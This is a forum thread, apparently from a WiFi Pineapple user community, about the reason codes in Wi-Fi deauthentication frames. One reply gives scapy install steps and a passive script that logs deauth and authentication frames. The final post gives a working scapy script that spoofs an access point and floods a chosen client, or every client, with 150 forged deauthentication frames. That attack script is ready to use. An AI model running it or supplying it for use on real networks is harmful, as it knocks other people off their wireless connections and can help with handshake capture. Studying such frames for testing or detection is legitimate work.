Deauthentication reason code

ehem

On 3/16/2017 at 2:40 AM, ehem said:

Hi - new to WiFi Pineapple - I need to be able to specify the de-authentication reason code.  Can this be done?

thanks.

This interested me too so had a look around I didn’t see anything to specify them on the pineapple "/pineapple/modules/PineAP/executable/executable" was the closest I came to finding deauth instructions. -  but was able to read them doing the below: -

Found a python script that can do it and it only needed small modification to work.

Install scapy onto pineapple: -

opkg update
opkg upgrade tar wget
opkg install python tcpdump unzip
wget https://github.com/secdev/scapy/archive/v2.4.3rc1.tar.gz
tar -xvf v2.4.3rc1.tar.gz
cd scapy*
python setup.py install
cd ..
rm -rf scapy*

make the authwatch.py - i just used nano and pasted the following into it: -

#!/usr/bin/env python

######################################################
#	authWatch.py v. 0.1 (Quick, Dirty and Loud) - by TinMan
#	Place card in monitor mode and set the channel. 
#	If you want channel hopping, run airodump-ng in 
#	another terminal. Will add channel hopping 
# 	in the next version. 
######################################################	
#
#	Usage: python authWatch.py 
#	

import sys
from scapy.all import *

interface = sys.argv[1]

def sniffReq(p):
     if p.haslayer(Dot11Deauth):
# Look for a deauth packet and print the AP BSSID, Client BSSID and the reason for the deauth.
           print p.sprintf("Deauth Found from AP [%Dot11.addr2%] Client [%Dot11.addr1%], Reason [%Dot11Deauth.reason%]")
# Look for an association request packet and print the Station BSSID, Client BSSID, AP info.
     if p.haslayer(Dot11AssoReq):
           print p.sprintf("Association request from Station [%Dot11.addr1%], Client [%Dot11.addr2%], AP [%Dot11Elt.info%]")
# Look for an authentication packet and print the Client and AP BSSID
     if p.haslayer(Dot11Auth):
	   print p.sprintf("Authentication Request from [%Dot11.addr1%] to AP [%Dot11.addr2%]")
 	   print p.sprintf("------------------------------------------------------------------------------------------")
sniff(iface=interface,prn=sniffReq)

Then to use drop an interface into monitor mode on the channel you wish to watch - example below uses wlan1 and channel 1.

airmon-ng start wlan1 1

***optionally you can run airodump-ng if you want to channel hop, But you will likely miss some packets.

To run the authwatch script

python authwatch.py wlan1mon

I tested this on my Pineapple TETRA and saw when the pineapple deauths clients I get "Reason [unspec]" when I turn off my wifi on my phone I get "Reason [deauth-ST-leaving]".

Seems to work. Hope this helps.

authwatcher.py

scappyinstall.sh

Edited by Just_a_User
  • Upvote 1

thanks  for the reply - very helpful - I had no idea you could install scapy on the pineapple.

Here is a script I wrote in python using scapy to perform a de-auth with a specific reason code.  It takes care of setting the channel, etc... but you have to run airmon-ng check kill and airmon-ng start wlan0 (whatever your interface is).  There are some devices that will behave differently depending on the reason code you send in the de-auth.

Here is a link to a list of the auth and de-auth reason codes and what they all mean/are for.  https://supportforums.cisco.com/document/141136/80211-association-status-80211-deauth-reason-codes

import sys
from scapy.all import *
print "Syntax: deauth.py <BSSID MAC> <Client MAC or ff:ff:ff:ff:ff:ff> <Interface> <channel>"
print "Example: deauth.py 00:aa:33:bb:77:cc 00:aa:44:dd:88:ee wlan0mon 153"
iw="iwconfig "+sys.argv[3]+" channel "+sys.argv[4]
numpackets=150
hitinter = 0.001
print "Setting Channel with "+iw
os.system(iw)
print "Sending deauth as BSSID "+sys.argv[1]+" to client MAC address "+sys.argv[2]+" on channel "+sys.argv[4]
print "On interface "+sys.argv[3]
pkt = RadioTap () / Dot11( addr1 = sys.argv[2], addr2 = sys.argv[1], addr3 = sys.argv[1])/ Dot11Deauth(reason= 7)
sendp(pkt, iface = sys.argv[3], count = numpackets, inter = hitinter)
print "Complete."

Edited by ehem
  • Upvote 2